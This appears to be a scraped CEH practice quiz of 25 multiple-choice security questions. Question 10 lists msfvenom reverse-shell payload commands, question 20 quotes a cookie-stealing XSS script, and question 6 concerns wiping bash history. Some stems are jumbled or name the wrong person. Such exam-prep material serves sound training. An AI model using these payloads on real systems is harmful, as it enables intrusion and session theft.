Test CEH 2

Beschreibung

test ceh
Cristian Osvaldo Gómez
Quiz von Cristian Osvaldo Gómez, aktualisiert more than 1 year ago
Cristian Osvaldo Gómez
Erstellt von Cristian Osvaldo Gómez vor etwa 2 Jahre
1124
0

Zusammenfassung der Ressource

Frage 1

Frage
Taylor, a security professional, uses a tool to monitor her company's website, website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?
Antworten
  • WebSite-Watcher
  • Web-Stat
  • WAFWOOF
  • Webroot

Frage 2

Frage
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?
Antworten
  • ARP ping scan
  • UDP Scan
  • ACK flag probe scan
  • TCP Maimon scan

Frage 3

Frage
What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?
Antworten
  • White-hat hacking program
  • Vulnerability hunting program
  • Ethical hacking program
  • Bug bounty program

Frage 4

Frage
Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?
Antworten
  • Session donation attack
  • Session fixation attack
  • forbidden attack
  • CRIME attack

Frage 5

Frage
Henry is a cyber security specialist hired by BlackEye - Cyber Security Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.
Antworten
  • 128
  • 255
  • 64
  • 138

Frage 6

Frage
By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?
Antworten
  • profile
  • xsession-log
  • bash history
  • bashrc

Frage 7

Frage
A DDoS attack is performed at laver 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple requests to complete. Which attack is being described here? connections and keeps waiting for the
Antworten
  • Phlashing
  • Slowloris attack
  • Desynchronization
  • Session splicing

Frage 8

Frage
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?
Antworten
  • The attacker uses TCP to poison the DNS resolver
  • The attacker makes a request to the DNS resolver
  • The attacker forges a reply from the DNS resolver
  • The attacker queries a nameserver using the DNS resolver

Frage 9

Frage
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?
Antworten
  • Agent-based scanner
  • Network-based scanner
  • Proxy scanner
  • Cluster scanner

Frage 10

Frage
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
Antworten
  • mstvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT-4444 -f exe > shell.exe
  • msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT-4444 -f exe> shell.exe

Frage 11

Frage
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?
Antworten
  • Application assessment
  • Wireless network assessment
  • Distributed assessment
  • Host-based assessment

Frage 12

Frage
Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation. Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?
Antworten
  • HTTPS
  • IP
  • FTPS
  • FTP

Frage 13

Frage
Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?
Antworten
  • Towelroot
  • Knative
  • Bluto
  • ZANTI

Frage 14

Frage
In order to tailor your tests during a web-application scan, you decide to determine which the web-server version is hosting the application. On using the sV flag with Nmap, you obtain the following response: 80/tcp open http-proxy Apache Server 7.1.6 What information-gathering technique does this best describe?
Antworten
  • Banner grabbing
  • Brute forcing
  • Dictionary attack
  • WHOIS lookup

Frage 15

Frage
Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting?
Antworten
  • File-less malware
  • Phishing malware
  • Logic bomb malware
  • Zero-day malware

Frage 16

Frage
Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?
Antworten
  • Hootsuite
  • VisualRoute
  • HULK
  • ophcrack

Frage 17

Frage
Which of the following bluetooth hacking techniques refers to the theft of information from a wireless device through bluetooth?
Antworten
  • Bluesmacking
  • Bluebugging
  • Bluejacking
  • Bluesnarfing

Frage 18

Frage
Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online 2 and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
Antworten
  • nmap -sn -PP < target IP address >
  • nmap -sn-PO < target IP address >
  • nmap -sn-PS< target IP address >
  • nmap -sn-PA < target IP address >

Frage 19

Frage
Which file is a rich target to discover the structure of a website during web-server footprinting.
Antworten
  • Index.html
  • robots.txt
  • domain.txt
  • document root

Frage 20

Frage
Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images: <script> document.write('<img src="https://localhost/submitcookie.php? cookie ='+ escape(document.cookie) + " />); </script> What issue occurred for the users who clicked on the image?
Antworten
  • This php file silently executes the code and grabs the user's session cookie and session ID.
  • The code is a virus that is attempting to gather the user's username and password.
  • The code injects a new cookie to the browser.
  • The code redirects the user to another site.

Frage 21

Frage
An attacker redirects the victim to malicious websites by sending them a malicious link, by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?
Antworten
  • Spoofing
  • Vishing
  • DDoS
  • Phishing

Frage 22

Frage
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?
Antworten
  • Cloud broker
  • Cloud auditor
  • Cloud consume
  • Cloud carrier

Frage 23

Frage
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?
Antworten
  • Phishing
  • Quid pro quo
  • Elicitation
  • Diversion theft

Frage 24

Frage
Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?
Antworten
  • Website defacement
  • Web cache poisoning
  • Session hijacking
  • Website mirroring

Frage 25

Frage
Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?
Antworten
  • <20>
  • <1B>
  • <00>
  • <03>
Zusammenfassung anzeigen Zusammenfassung ausblenden

ähnlicher Inhalt

Modulo 1 CEH
Pico Pico menoriko
Öff. Recht - Definitionen
myJurazone
Genetik
Nele Ramrath
Können Sie die Flosse der Airline zuordnen?
B G
Berliner Mauer - Quiz
Laura Overhoff
Vetie Allgemeine Pathologie Altfragen 2016
Nele Unger
Vetie Mibi 2018
Tropsi B
Vetie-Innere 2014
Ju Pi